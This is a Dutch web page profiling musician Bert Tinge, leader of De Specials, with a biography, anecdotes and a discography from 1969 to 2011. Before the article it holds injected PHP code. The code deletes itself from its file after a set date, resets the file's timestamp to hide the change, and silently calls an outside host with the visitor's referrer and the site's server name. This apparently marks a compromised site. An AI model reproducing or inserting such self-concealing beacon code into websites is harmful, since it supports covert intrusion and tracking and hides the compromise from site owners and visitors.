check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735524){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Tinge, Bert

Tinge, Bert

Bert Tinge is 7Huizen's '#1 recording artist' en vooral bekend als leider van de band De Specials. Bert is via Oudehaske, Lemmer en Leek, in 7Huizen belandt. Hier kent men hem, als muzikant maar ook van Horecacentrum Aubergine.

Behalve met De Specials heeft Bert ook als solist het nodige werk afgeleverd, o.a in het Fries. Tevens hij leverancier van teksten en/of muziek voor anderen, producer, arrangeur en eigenaar van de Special Sound Recording Studio (aan De Haspel) en van het Special Sound label.

01_specialsoundstudio

Bert Tinge, in het Friese Oudehaske geboren, in een uiterst muzikale familie opgroeide. “Vader, twee oudere broers en ook mijn zus speelden in de plaatselijke harmonie, sterker: ze vormden daar de basis. Het was bij ons thuis een en al muziek. Als jonkie van zeven leerde ik mezelf al de bariton bespelen. Ik was een muzikaal buitenbeentje, had een absoluut gehoor. Speciaal voor mij werden de repetitietijden van de muziek vervroegd, zodat ook ik mijn partijtje mee kon blazen. Daarnaast speelde ons gezin overal. Gewoon soms langs de weg. Dat hoorde de directeur van een circus in Sneek en die contracteerde ons meteen als hoofdact tijdens hun optredens daar.”

De Tinges werden veel gevraagd, ook bij de radio. Het waren schitterende tijden en Bert wilde na zijn schooltijd ‘in de muziek’ verder. “Eigenlijk wilde ik boer worden, het vrije leven. Pa vond dat maar niks en liet me een opleiding tot banketbakker volgen. Maar ik bespeelde inmiddels wél heel wat instrumenten.

02_despecials

De Specials met als 2e van links, Bert Tinge

We waren ook naar Lemmer verhuisd, waar ik de viermansband The Blue Stars vormde. Later werd dat De Specials waarmee we veel optraden en ook hitjes hadden. Onze grote landelijke doorbraak kwam in de tijd dat schaatser Jan Bols glorieerde.

In 1971 speelden we als opwarmorkest in Thialf, toen Bols daar bij de 5.000 meter twee keer de buitenbaan achter elkaar reed en – in kansrijke positie voor het wereldkampioenschap – werd gediskwalificeerd. Heel alert – ja, dat mag je een sterk punt van me noemen - reageerde ik daarop, door bijna á la minute met De Specials de schlager ‘Hey Jan Bols’ te spelen. Thialf stond daarna nog úren op zijn kop. ’t Zelfde met ‘Ard die heeft de wereldcup’.

Hit op hits volgden, zoals ‘Ajax wint de wereldcup’ en het clublied van FC Groningen, waarbij Pietje Fransen de tekst inzong. Ook warmden we voorafgaand aan Europacup-wedstrijden van Groningen op de middenstip van het Oosterpark Stadion het publiek op.” Hij heeft als musicus genoten, erkent Tinge. Of hij er financieel ‘alles’ uit heeft gehaald wat er in zat, betwijfelt hij. “Ik ben muzikant, zakendoen ligt me niet. Er zijn, dat weet ik zeker, platenbazen en andere bij muziek betrokkenen, die van ons hebben geprofiteerd. Maar we hebben een prachtige tijd gehad. Veel prominente artiesten begeleid en ook mooie buitenlandse tournees gehad. Zoals in Zwitserland waar we eens bijna twee uur lang door handtekeningenjagers werden belaagd. We leken the Beatles wel. Kijk, dat pakken ze me nooit meer af.”

03_top40noteringen

Hij doet het, na een druk muzikaal leven, rustiger aan nu. Maar tóch bruist het nog bij hem van binnen. Akkoord, hij ‘doet’, vooral samen met Peter Vorenholt van PVM-productions aan Oostindië bést nog het een en ander op muziekgebied, want: “Het klikt tussen ons. Peter heeft een prima studio en is muzikaal heel begaafd. Met ons tweeën zijn we regelmatig kleinschalig bezig. Dat de appel niet ver van de boom valt bewijzen Bert's zonen Michel, Eddy en Frank, alle drie zijn ze net als pa muzikaal actief.

04_bertin2011

 ('11) Bert, zonder stekker in de tuin

Selectieve Discografie De Specials/Bert Tinge

Note *) Van 1969 tot 1971 werken Bert en De Specials nauw samen met Peter Koelewijn. De cursieve teksten in de selectieve discografie '69 t/m '71, zijn afkomstig van Peter Koelwijn en gemarkeerd met P.K:

1969 - De Specials - Tante Nel/ Goal 7''

         - De Specials - Tomaatje/ Tante Nel 7'' (Olala 50 04)

1969tantenel tomaatje

P.K: Op een dag in 1969 kwam leider Bert Tinge bij Peter Koelewijn met een bandje met daarop het door de groep geschreven liedje “Tomaatje”. Een erg ondeugend liedje. Koelewijn nam het op, ging er mee naar Dureco en de mensen daar vonden het net zo´n hit als de producer. “Alleen, de tekst is wel érg dubbelzinnig”, fronste men daar “dat kunnen we niet zomaar op één van onze normale labels zetten”. Dus werd “Tomaatje”, laf natuurlijk, uitgebracht op het Olala label. De plaat bereikte de 24 ste plaats.

1970 - De Specials - Spaanse Vliegenier/ Buurman 7'' (Olala 50 06)

         - De Specials - Spaans Café/ Waar Had Ik Mijn Verstand 7'' (ELF 65 35)

         - De Specials - Je Hebt Het Helemaal/ Rosita 7'' (ELF 75 77)

1970spaansevliegenier 1970spaanscafe1specials 1970jehebthethelemaal

1970 - De Specials - Sexsellers Album (Olala 79 001)

         - De Hekke-Sluiters - Spaans Café/ Waar Had Ik Mijn Verstand 7''

P.K: De leider van de Specials, Bert Tinge, woonde in het Groningse Leek en hun oefenruimte was daar in de buurt. Op een winterse dag sprak Peter Koelewijn af om naar de repetitie te komen om naar nieuwe liedjes voor de LP te komen luisteren . Na afloop trok het hele stel naar een café in de buurt waar het heel gezellig was. “Hé, het sneeuwt”, zei iemand toen ieder net aan het eerste drankje was begonnen. Peter, die die avond nog helemaal terug moest naar Soest, had het bijzonder naar zijn zin en tot diep in de nacht bleef hij kletsen in de kroeg. Toen hij tenslotte iedereen vaarwel had gezegd en naar buiten ging, stond hij tot boven zijn enkels in de sneeuw. En die kwam nog steeds met zwembaden vol naar beneden. “Blijf nou hier slapen”werd hem vriendelijk aangeboden, maar de producer/songwriter was weer eens eigenwijs. Twee uur later had hij eindelijk bij toeval de snelweg gevonden en in een absolute blizzard reed hij met hoogstens 20 kilometer per uur achter een vrachtwagen zuidwaarts. Af en toe schoof hij een nauwelijks te onderscheiden parkeerplaats op om vijf minuten de ogen dicht te doen. Links en rechts van de weg zag hij soms gestrande wagens, al of niet door een botsing en vaak behoorlijk gedeukt. Verkeersborden waren bijna niet te zien. De ruitenwissers konden soms de karrenvrachten sneeuw niet aan. De volgende dag om drie uur ’s middags reed hij uitgeput Soest binnen. Volledig gesloopt wilde Peter in bed vallen toen de telefoon ging. Bert Tinge aan de lijn. “We dachten dat je nu wel weer op zou zijn. Eigenlijk is het niet zo ver als je eenmaal op de snelweg zit. Hoe lang heb je er eigenlijk over gedaan…?

1970sexsellers 1970spaanscafe2hekkesluiters

P.K: De Hekke-Sluiters; Een zeer vreemde geschiedenis, die Peter Koelewijn desgevraagd ook niet meer kan verklaren. De plaat komt in hetzelfde jaar uit onder twee verschillende namen: De Specials en De Hekkesluiters. Op de hoezen gaat het ook om precies dezelfde groepsleden, waaronder de liedjesschrijver Bert Tinge en Adri Hogenbirk.

1971 - De Specials - Heya Jan Bols/ Wat Gaan Ze Hard Op De Schaatsen 7''  (ELF 66 25)

         - De Specials - Ard Die Heeft De Wereldcup/ Wat Gaan Ze Hard Op De Schaatsen 7'' (ELF 66 40)

         - De Specials - Ajax Wint De Wereldcup/ Onze Voetbalclub Heeft Elf Zonen 7'' (ELF 66 41)

1971heyajanbols

P.K: Een jaar later zat Peter naar het schaatsen te kijken op de TV en zag dat Ard Schenk wereldkampioen zou gaan worden, toen de telefoon ging. Rob Aartse, direkteur van Dureco aan de lijn. “Waar ben je?”, vroeg die redelijk onnozel, want hij belde Peter privé. “Thuis”, zei die dan ook, “ik kijk naar het schaatsen”. “Precies”, kreeg hij als antwoord, “en hoor je dan niks? Dat publiek? Dat roept al een paar uur lang “Ard die heeft de wereldcup”. Dat hoor jij toch óók. Je had allang in de studio moeten zitten!”.Dus dat deed Koelewijn, hij schreef “Ard die heeft de wereldcup” en nam in een paar uur tijd het lied op. En die plaat bereikte de twintigste plaats van de hitparade.

1971arddieheeftdewereldcup

P.K: In 1971 sloeg Jan Bols bij de Nederlandse kampioenschappen toe want lange tijd was hij in Nederland de derde schatser achter Ard Schenk en Kees Verkerk. Hij werd nationaal kampioen. De Specials maakten samen met Peter Koelewijn een Nederlandse cover van het “Ta ta ta” van de heren Juwens en Halburg en gaven het de titel “Heya Jan Bols” mee.

Jan Bols was trouwens in 1971 de grote kanshebber om Europees kampioen te worden. Door een verkeerde wissel (de schaatser reed twee keer de buitenbaan op de 5000 meter) werd hij echter gediskwalificeerd. Op de B kant kwam het Koelewijn liedje “Wat gaan ze hard op de schaatsen”, hetzelfde dat ook op de B kant van “Ard die heeft de wereldcup” werd gezet. “Om kosten te sparen”, meldde de producer toen. Hij vergat er bij te zeggen dat hij het liedje ook al eens in 1968 had opgenomen met De Praatpalen als B kant van “Ome Sjakie”.

1971ajaxwintdewereldcup

P.K: Het seizoen 1970-1971 was een topseizoen voor Ajax. En aangezien er nog een orkestband in de studio lag van “Ard die wint de wereldcup”, was het een kleine moeite de tekst te veranderen in “Ajax wint de wereldcup” en dat opnieuw met The Specials in te zingen. Deze track kwam later op bijna alle LP´s en CD´s die er verschenen met Ajax als onderwerp.

Het vreemde is dat de titel op de B-kant wat verwarring oplevert. Op het label staat "Ons elftal heeft elf zonen" maar op de hoes blijkt de titel te zijn: "Onze voetbalclub heeft elf zonen". Dit was het roemruchte Ajax-elftal onder trainer Rinus Michels met o.a. Johan Cruyff, Barry Hushoff en de gebroeders Mühren.

1972 - De Specials - Cruyffie, Oh Cruyffie/ Ajax 7'' (ELF 66 95)

         - De Specials - In The Sunlight/ Arah The Arab 7'' (ELF 67 31)

1972cruyffieohcruyffie 1972inthesunlight

1973 - De Specials - Oei, Oei De Beer Is Los/ Ja, Ik Wil Jou Alleen 7'' (De Zilvervloot 05 15193-4)

         - De Specials - Tomaatje/ Ik Heb 'm 7'' (Dureco 4237)

         - Jan & Zwaantje - Veronica/ 538 Mars 7'' (BASF 05 15.236) 
            Kant A geschreven door Bert Tinge en Dick Swaneveld, kant B door Bert Tinge

1973oeioeidebeerislos 1973janzwaantjeveronica

1974 - De Specials - Laat Ons Weer Eens Juichen, FC Groningen
         - De Specials - Hey, Hey Fideldomdee (Nait Soez'n) 7'' (FC 500)

         Tekst B. van Luit/Muziek Bert Tinge      

1974laatonsweereensjuichenfcgroningen1 1974laatonsweereensjuichenfcgroningen2

1974 - De Specials - Meisjes/ Cindy 7'' (De Zilvervloot 05 15462-3)

         - Duo De Blaaspijpjes - Blazen In 't Ballonnetje 7''  (De Zilvervloot 05 15475-5)

         - Duo De Blaaspijpjes - De Politie Is Je Beste Vriend 7''  (De Zilvervloot 05 15475-5)

           Het duo De Blaaspijpjes is een alias van Bert Tinge en Dick Swaneveld.

           De laatste is bekend van het Tom & Dick (hit 'Bloody Mary')

1974meisjes 1974duodeblaaspijpjes

1974 - Hydra – 't Geeft Allemaal Niks 7'' (Polydor 2050291)

           De eerste (hit)single van de Drentse formatie Hydra haalt de 25e plaats in de Nederlandse Top 40.

              Tekstschrijver van het nummer is Bert Tinge.

           Later zal Hydra nog hits scoren met 'Marietje' en 'Als Het Gras Twee Kontjes Hoog Is'.

1974hydra1 1974hydra2

1975 - De Specials - Regreza Maria/ Daddy's Old Piano 7'' (BASF 05 15522-0)

         - De Specials - Roekie Zoekie/ Beter Eén Pils In De Hand 7'' (Polydor 2050 389) 

           Samen met Jan van de Zon

         - Diverse artiesten - 16 Sappige Zomersongs Album (CNR LC 00160)  

           Het nummer 'In The Sunlight' staat op dit verzamelalbum

1975regrezamaria

1976 - De Specials - Overal Zijn Mooie Meisjes/ En Van Je Hela Hola 7'' (CNR 141 377) 

            'Overal Zijn Mooie Meisjes' verscheen tevens op de verzamel LP 

            'De Daverende Dertien Carnaval' (CNR Records 538.109)

         - De Specials - Het Piet Kleine Lied/ Verslag Race 10.000 meter 7'' (CNR 141 331)

            Samen met Piet Kleine fanclub

         - Diverse artiesten - Wij Komme Út Fryslân Album (Fontana 6416 110)  

            Het nummer 'Ik Kom Út Fryslân' wordt gezongen door Ben Mol en is geschreven door Bert Tinge

1976daverendedertiencarnaval 1976overalzijnmooiemeisjes 1976wykommeutfryslan

1977 - De Specials - Olé Feenstra/ Thialfwals 7'' (Telstar 2601)

         - De Gema's - Veen, Jenever En Achterdocht/ Ik Kom Ut Norg 7'' (HUP 039) 

           De B-Kant is geschreven en geproduceerd door Bert Tinge

1977degemas 1977olefeenstra

1978 - Piet Fransen - Mijn FC Groningen/ Afscheid Van Een Voetballer 7'' (Telstar TS  2633 TF)

            Productie Bert Tinge

1978mijnfcgroningen

1979 - Antonio Gomez Fernandez - Antonio Gomez, Olé! 7'' (Telstar TS 2939 TF) Alter ego van Bert Tinge

         - De Specials - Polka Pose/ Oh, Wat Een Tijd 7'' (WEA WEAN 18 012)

         - De Specials - Amore/ Ik Ben 'n Mens 7'' (Telstar 2822)

         - De Specials - Holadijee/ 's Zondagsmorgens 7'' (Telstar 2878)

1979polkapose 1979amore

1980 - De Specials – Tomaatje/ Voor Jou 7'' (Telstar 3066)

         - De Specials, Piet Fransen & de FC supporters - Het FC Groningen Kampioenslied (Olé) 7''

         - De Specials, Piet Fransen & de FC supporters - FC Groningen Olé 7''

           Opnieuw uitgebracht i.v.m. FC Groningen's kampioenschap en promotie naar de Eredivisie

1980

1981 - De Specials - Ik Zal Nooit Meer Dronken WezenNee, Nee Vergeet Het Maar 7'' (Telstar 3237)

         - De Specials - 's Zondagsmorgens Naar Opa en Oma/ Alles In 't Leven 7''  (Telstar 3418)

         - De Specials - Radio Monte Video/ Hou 'm In De Lucht 7'' (Starlet 10 150)

         - De Flipperkoning - Lekker Flipperen 7'' (CNR Records 144.813)  Alter ego van Bert Tinge

         - Bert Tinge - Ik Maak Het Helemaal Vandaag/ Zeg Nog Niet Tot Ziens 7''  (Telstar 3305 TF)

1981lekkerflipperen 1981ikmaakhethelemaalvandaag 1981szondagsmorgensnaaropaenoma

1982 - Bert Tinge - De Ster/ Verliefd, Verloren 7'' (Special Sound 46 28)

1982dester

1983 - De Specials - Dronken Sappie/ Rode Rozen 7'' (NON 178)

         - De Specials - Je Hebt Het Helemaal/ Rosita 7''

         - Bert Tinge - Hoe Kon Ons Dit Gebeuren/ Mijn Hele Leven 7''  (Special Sound 47 28)

1983dronkensappie 1983jehebthethelemaal

1984 - Bert Tinge - Niets Meer Te Zeggen/ Voorbij 7'' (Special Sound 48 80)

1984nietsmeertezeggen

1985 - Bert Tinge - Is Er Dan Niemand (Die Er Iets Aan Doet)/ Mijn Zoon 7'' (CNR Music 145 171)

1985iserdanniemand

1986 - De Specials, Rob Jacobs & A-Selectie – FC Groningen Olé (Not On Label TBS 4460)

          - De Specials, Rob Jacobs & A-Selectie - Aegon FC Groningen Lied 7'' (Not On Label TBS 4460)

           A-Kant geschreven door B. Van Luit en Bert Tinge en de B-Kant door Bert Tinge en Jenne Meinema

1986

1990 - De Specials - Wij Blijven Vrienden Van FC Groningen/ FC Groningen Olé 7''

                               Samen met de selectie van de FC + Vrienden

1993 - De Specials & Spelers SC Heerenveen - Ús Heerenveen /Supporterslied / Fries Volkslied CD-S (PRCD 16093)

1993usheerenveen

1996 - De Specials - Dat We Nederlanders Zijn Willen We Weten Album (PRCD 96005)

1997 - De Specials & SC Heerenveen Supporters - Wij Zijn Eén Grote Familie/Dit Is M'n Club / SC Heerenveen/ Abe

                                                                    - Heerenveen, Nummer Eén CD-S (PRCD 97003)

1997eengrotefamilie

2000 - Bert Tinge - In Mûdhûn Yn 'e Rein Wettersbak Album (PRCD 200011)

2000inmudhunynereinwettersbak 2000mudhun

 Simmer 2000/ Mem/ It Aldershus/ Neat Mear Te Sizzen/ It Jonkje/

 Wrald Fan Goud/ Ik Bliuw By Dy/ Bjusterbaarlik/ Sytske/ Ik Kom Ut Fryslan/

 Sunder Dy/ Brúne Wietzke/ Nannewiid/ Fryslan, Oh Fryslan

2010 - Burdy - FC Groningen Olé (cover versie) CD-S


      2010burdy

2011 - De Specials zijn weer terug. De band, die in de jaren zeventig en tachtig furore maakte, is uit haar as herrezen. De herstart wordt opgeluisterd met de lancering van een nieuwe versie van de cd ‘FC Groningen Olé Laat ons weer eens juichen!. Het aloude clublied heeft een complete metamorfose ondergaan en is voorzien van een eigentijds arrangement. De Specials hadden dertig jaar geleden meerdere Top 40-noteringen en traden op voor radio en tv. In die tijd werd het clublied van de FC uitgebracht. Dat geldt nog steeds als dé hymne voor de groen/witten. Toen enkele jaren geleden het voorstel was om een nieuw lied te maken, waren de protesten niet van de lucht. Omdat de jaren niet ongemerkt voorbij zijn gegaan, is de song in een nieuw jasje gestoken. De Specials bestaan uit Herman Bonthuis (gitaar), Peter Vorenholt (toetsen), Otto van der Heide (drums) en Bert Tinge (basgitaar).